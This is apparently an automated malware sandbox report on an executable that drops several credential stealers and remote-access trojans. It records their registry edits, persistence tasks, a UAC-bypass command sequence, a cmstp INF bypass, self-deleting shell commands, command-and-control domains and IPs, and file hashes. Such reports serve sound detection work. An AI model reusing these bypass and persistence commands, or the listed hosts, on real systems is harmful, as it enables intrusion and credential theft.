Analysis Overview
SHA256
959e3ca2579b6be8a11c06763c5a34ec118abc96d869e25bef06319c92da465e
Threat Level: Known bad
The file ED4D2E0F901BC478BE16D3DAD0D02792.exe was found to be: Known bad.
Malicious Activity Summary
Azorult
Raccoon Stealer Payload
suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M18
suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M3
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
Modifies Windows Defender Real-time Protection settings
Raccoon
Remcos
Contains code to disable Windows Defender
Oski
AsyncRat
Async RAT payload
Executes dropped EXE
Downloads MZ/PE file
Loads dropped DLL
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Deletes itself
Windows security modification
Checks installed software on the system
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Modifies registry key
Creates scheduled task(s)
Suspicious use of SetWindowsHookEx
Kills process with taskkill
Suspicious behavior: MapViewOfSection
Delays execution with timeout.exe
Checks processor information in registry
Suspicious use of WriteProcessMemory
Modifies system certificate store
MITRE ATT&CK Matrix V6
Analysis: static1
Detonation Overview
Reported
2021-08-13 11:33
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2021-08-13 11:33
Reported
2021-08-13 11:36
Platform
win7v20210408
Max time kernel
152s
Max time network
155s
Command Line
Signatures
AsyncRat
Azorult
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies Windows Defender Real-time Protection settings
Oski
Raccoon
Raccoon Stealer Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Remcos
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M3
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Executes dropped EXE
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Loads dropped DLL
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\d0VTgBMZj5.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\d0VTgBMZj5.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\Bdojytw = "C:\\Users\\Public\\Libraries\\wtyjodB.url" | C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\Jjdsdpr = "C:\\Users\\Public\\Libraries\\rpdsdjJ.url" | C:\Users\Admin\AppData\Local\Temp\KPJhVJcxrh.exe | N/A |
Checks installed software on the system
Suspicious use of SetThreadContext
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 | C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 | C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\GFDyrtucbvfdg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe | N/A |
| N/A | N/A | C:\ProgramData\GFDyrtucbvfdg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe
"C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe"
C:\ProgramData\GFDyrtucbvfdg.exe
"C:\ProgramData\GFDyrtucbvfdg.exe"
C:\ProgramData\GFDyrtucbvfdg.exe
"C:\ProgramData\GFDyrtucbvfdg.exe"
C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
"C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe"
C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe
"C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe"
C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
"C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe"
C:\Users\Admin\AppData\Local\Temp\o8jf0FpyIL.exe
"C:\Users\Admin\AppData\Local\Temp\o8jf0FpyIL.exe"
C:\Users\Admin\AppData\Local\Temp\KPJhVJcxrh.exe
"C:\Users\Admin\AppData\Local\Temp\KPJhVJcxrh.exe"
C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe
"C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /pid 756 & erase C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe & RD /S /Q C:\\ProgramData\\458908152343698\\* & exit
C:\Windows\SysWOW64\taskkill.exe
taskkill /pid 756
C:\Users\Admin\AppData\Local\Temp\d0VTgBMZj5.exe
"C:\Users\Admin\AppData\Local\Temp\d0VTgBMZj5.exe"
C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe
"C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe"
C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe
"C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe"
C:\Windows\SysWOW64\logagent.exe
C:\Windows\System32\logagent.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Public\Trast.bat" "
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
C:\Windows\SysWOW64\reg.exe
reg delete hkcu\Environment /v windir /f
C:\Windows\SysWOW64\reg.exe
reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "
C:\Windows\SysWOW64\schtasks.exe
schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Public\nest.bat" "
C:\Windows\SysWOW64\reg.exe
reg delete hkcu\Environment /v windir /f
C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe
"{path}"
C:\Users\Admin\AppData\Local\Temp\d0VTgBMZj5.exe
"{path}"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dCtjCu" /XML "C:\Users\Admin\AppData\Local\Temp\tmp3A90.tmp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
\??\c:\windows\SysWOW64\cmstp.exe
"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\udz2b2rb.inf
C:\Users\Admin\AppData\Local\Temp\o8jf0FpyIL.exe
"{path}"
C:\Windows\system32\taskeng.exe
taskeng.exe {E6E87F1B-80A7-427B-A640-09E5F00EB9D9} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]
C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | telete.in | udp |
| N/A | 195.201.225.248:443 | telete.in | tcp |
| N/A | 45.67.231.40:80 | 45.67.231.40 | tcp |
| N/A | 8.8.8.8:53 | danielmi.ac.ug | udp |
| N/A | 185.215.113.77:80 | danielmi.ac.ug | tcp |
| N/A | 8.8.8.8:53 | danielmax.ac.ug | udp |
| N/A | 185.215.113.77:80 | danielmax.ac.ug | tcp |
| N/A | 185.215.113.77:80 | danielmax.ac.ug | tcp |
| N/A | 8.8.8.8:53 | cdn.discordapp.com | udp |
| N/A | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 8.8.8.8:53 | sergio.ac.ug | udp |
| N/A | 79.134.225.25:6969 | sergio.ac.ug | tcp |
| N/A | 8.8.8.8:53 | ramosasdj.ac.ug | udp |
| N/A | 8.8.8.8:53 | parhatcsafxz.ac.ug | udp |
| N/A | 8.8.8.8:53 | heartdoaz.ac.ug | udp |
| N/A | 8.8.8.8:53 | aertdfvaz.ac.ug | udp |
| N/A | 79.134.225.25:6969 | sergio.ac.ug | tcp |
| N/A | 8.8.8.8:53 | ramosasdj.ac.ug | udp |
| N/A | 8.8.8.8:53 | icando.ug | udp |
| N/A | 8.8.8.8:53 | parhatcsafxz.ac.ug | udp |
| N/A | 8.8.8.8:53 | heartdoaz.ac.ug | udp |
| N/A | 8.8.8.8:53 | aertdfvaz.ac.ug | udp |
| N/A | 79.134.225.25:6969 | sergio.ac.ug | tcp |
| N/A | 8.8.8.8:53 | ramosasdj.ac.ug | udp |
| N/A | 8.8.8.8:53 | parhatcsafxz.ac.ug | udp |
| N/A | 8.8.8.8:53 | heartdoaz.ac.ug | udp |
| N/A | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 8.8.8.8:53 | www.microsoft.com | udp |
| N/A | 79.134.225.25:6969 | sergio.ac.ug | tcp |
| N/A | 8.8.8.8:53 | ramosasdj.ac.ug | udp |
| N/A | 8.8.8.8:53 | parhatcsafxz.ac.ug | udp |
| N/A | 8.8.8.8:53 | heartdoaz.ac.ug | udp |
| N/A | 8.8.8.8:53 | icacxndo.ac.ug | udp |
| N/A | 194.5.98.107:6970 | icacxndo.ac.ug | tcp |
| N/A | 79.134.225.25:6969 | sergio.ac.ug | tcp |
| N/A | 8.8.8.8:53 | ramosasdj.ac.ug | udp |
| N/A | 8.8.8.8:53 | parhatcsafxz.ac.ug | udp |
| N/A | 194.5.98.107:6970 | icacxndo.ac.ug | tcp |
| N/A | 79.134.225.25:6969 | sergio.ac.ug | tcp |
| N/A | 8.8.8.8:53 | ramosasdj.ac.ug | udp |
| N/A | 194.5.98.107:6970 | icacxndo.ac.ug | tcp |
| N/A | 8.8.8.8:53 | ocsp.verisign.com | udp |
| N/A | 23.51.123.27:80 | ocsp.verisign.com | tcp |
| N/A | 194.5.98.107:6970 | icacxndo.ac.ug | tcp |
| N/A | 79.134.225.25:6969 | sergio.ac.ug | tcp |
| N/A | 8.8.8.8:53 | ramosasdj.ac.ug | udp |
| N/A | 79.134.225.25:6969 | sergio.ac.ug | tcp |
| N/A | 79.134.225.25:6969 | sergio.ac.ug | tcp |
| N/A | 194.5.98.107:6970 | icacxndo.ac.ug | tcp |
| N/A | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 194.5.98.107:6970 | icacxndo.ac.ug | tcp |
| N/A | 79.134.225.25:6969 | sergio.ac.ug | tcp |
| N/A | 194.5.98.107:6970 | icacxndo.ac.ug | tcp |
Files
memory/684-62-0x0000000075C71000-0x0000000075C73000-memory.dmp
\ProgramData\GFDyrtucbvfdg.exe
| MD5 | 701f6f95d5e205b53b3a74403d46981a |
| SHA1 | 3e614af86675b0de761adb5d2fa271bfb3142b95 |
| SHA256 | 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459 |
| SHA512 | a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15 |
\ProgramData\GFDyrtucbvfdg.exe
| MD5 | 701f6f95d5e205b53b3a74403d46981a |
| SHA1 | 3e614af86675b0de761adb5d2fa271bfb3142b95 |
| SHA256 | 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459 |
| SHA512 | a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15 |
C:\ProgramData\GFDyrtucbvfdg.exe
| MD5 | 701f6f95d5e205b53b3a74403d46981a |
| SHA1 | 3e614af86675b0de761adb5d2fa271bfb3142b95 |
| SHA256 | 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459 |
| SHA512 | a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15 |
memory/2016-65-0x0000000000000000-mapping.dmp
\ProgramData\GFDyrtucbvfdg.exe
| MD5 | 701f6f95d5e205b53b3a74403d46981a |
| SHA1 | 3e614af86675b0de761adb5d2fa271bfb3142b95 |
| SHA256 | 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459 |
| SHA512 | a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15 |
C:\ProgramData\GFDyrtucbvfdg.exe
| MD5 | 701f6f95d5e205b53b3a74403d46981a |
| SHA1 | 3e614af86675b0de761adb5d2fa271bfb3142b95 |
| SHA256 | 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459 |
| SHA512 | a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15 |
memory/2044-72-0x000000000041A684-mapping.dmp
C:\ProgramData\GFDyrtucbvfdg.exe
| MD5 | 701f6f95d5e205b53b3a74403d46981a |
| SHA1 | 3e614af86675b0de761adb5d2fa271bfb3142b95 |
| SHA256 | 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459 |
| SHA512 | a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15 |
memory/684-74-0x0000000000230000-0x0000000000231000-memory.dmp
memory/2016-76-0x00000000003C0000-0x00000000003C8000-memory.dmp
memory/2016-75-0x0000000000240000-0x0000000000241000-memory.dmp
memory/2044-77-0x0000000000400000-0x0000000000420000-memory.dmp
\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
| MD5 | 93fffc6736b1dd95a4f4e88734e9d540 |
| SHA1 | 509a9acffd9b9123fff2a3df9a860b829210f80a |
| SHA256 | 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0 |
| SHA512 | d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed |
\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
| MD5 | 93fffc6736b1dd95a4f4e88734e9d540 |
| SHA1 | 509a9acffd9b9123fff2a3df9a860b829210f80a |
| SHA256 | 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0 |
| SHA512 | d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed |
memory/2040-80-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
| MD5 | 93fffc6736b1dd95a4f4e88734e9d540 |
| SHA1 | 509a9acffd9b9123fff2a3df9a860b829210f80a |
| SHA256 | 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0 |
| SHA512 | d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed |
memory/1732-83-0x000000000044003F-mapping.dmp
memory/2044-86-0x0000000000230000-0x0000000000231000-memory.dmp
memory/1732-87-0x0000000000400000-0x0000000000495000-memory.dmp
memory/1732-88-0x0000000000240000-0x0000000000241000-memory.dmp
\Users\Admin\AppData\LocalLow\sqlite3.dll
| MD5 | f964811b68f9f1487c2b41e1aef576ce |
| SHA1 | b423959793f14b1416bc3b7051bed58a1034025f |
| SHA256 | 83bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7 |
| SHA512 | 565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4 |
\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\nss3.dll
| MD5 | 02cc7b8ee30056d5912de54f1bdfc219 |
| SHA1 | a6923da95705fb81e368ae48f93d28522ef552fb |
| SHA256 | 1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5 |
| SHA512 | 0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5 |
\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\mozglue.dll
| MD5 | eae9273f8cdcf9321c6c37c244773139 |
| SHA1 | 8378e2a2f3635574c106eea8419b5eb00b8489b0 |
| SHA256 | a0c6630d4012ae0311ff40f4f06911bcf1a23f7a4762ce219b8dffa012d188cc |
| SHA512 | 06e43e484a89cea9ba9b9519828d38e7c64b040f44cdaeb321cbda574e7551b11fea139ce3538f387a0a39a3d8c4cba7f4cf03e4a3c98db85f8121c2212a9097 |
\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\msvcp140.dll
| MD5 | 109f0f02fd37c84bfc7508d4227d7ed5 |
| SHA1 | ef7420141bb15ac334d3964082361a460bfdb975 |
| SHA256 | 334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4 |
| SHA512 | 46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39 |
\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\vcruntime140.dll
| MD5 | 7587bf9cb4147022cd5681b015183046 |
| SHA1 | f2106306a8f6f0da5afb7fc765cfa0757ad5a628 |
| SHA256 | c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d |
| SHA512 | 0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f |
\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\softokn3.dll
| MD5 | 4e8df049f3459fa94ab6ad387f3561ac |
| SHA1 | 06ed392bc29ad9d5fc05ee254c2625fd65925114 |
| SHA256 | 25a4dae37120426ab060ebb39b7030b3e7c1093cc34b0877f223b6843b651871 |
| SHA512 | 3dd4a86f83465989b2b30c240a7307edd1b92d5c1d5c57d47eff287dc9daa7bace157017908d82e00be90f08ff5badb68019ffc9d881440229dcea5038f61cd6 |
\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\freebl3.dll
| MD5 | 60acd24430204ad2dc7f148b8cfe9bdc |
| SHA1 | 989f377b9117d7cb21cbe92a4117f88f9c7693d9 |
| SHA256 | 9876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97 |
| SHA512 | 626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01 |
\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\freebl3.dll
| MD5 | 60acd24430204ad2dc7f148b8cfe9bdc |
| SHA1 | 989f377b9117d7cb21cbe92a4117f88f9c7693d9 |
| SHA256 | 9876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97 |
| SHA512 | 626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01 |
\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
| MD5 | 93fffc6736b1dd95a4f4e88734e9d540 |
| SHA1 | 509a9acffd9b9123fff2a3df9a860b829210f80a |
| SHA256 | 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0 |
| SHA512 | d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed |
C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
| MD5 | 93fffc6736b1dd95a4f4e88734e9d540 |
| SHA1 | 509a9acffd9b9123fff2a3df9a860b829210f80a |
| SHA256 | 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0 |
| SHA512 | d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed |
memory/2040-101-0x00000000003D0000-0x00000000003D1000-memory.dmp
memory/756-102-0x0000000000417A8B-mapping.dmp
C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
| MD5 | 93fffc6736b1dd95a4f4e88734e9d540 |
| SHA1 | 509a9acffd9b9123fff2a3df9a860b829210f80a |
| SHA256 | 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0 |
| SHA512 | d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed |
memory/756-105-0x0000000000400000-0x0000000000434000-memory.dmp
\ProgramData\sqlite3.dll
| MD5 | e477a96c8f2b18d6b5c27bde49c990bf |
| SHA1 | e980c9bf41330d1e5bd04556db4646a0210f7409 |
| SHA256 | 16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660 |
| SHA512 | 335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c |
\ProgramData\nss3.dll
| MD5 | bfac4e3c5908856ba17d41edcd455a51 |
| SHA1 | 8eec7e888767aa9e4cca8ff246eb2aacb9170428 |
| SHA256 | e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78 |
| SHA512 | 2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66 |
\ProgramData\mozglue.dll
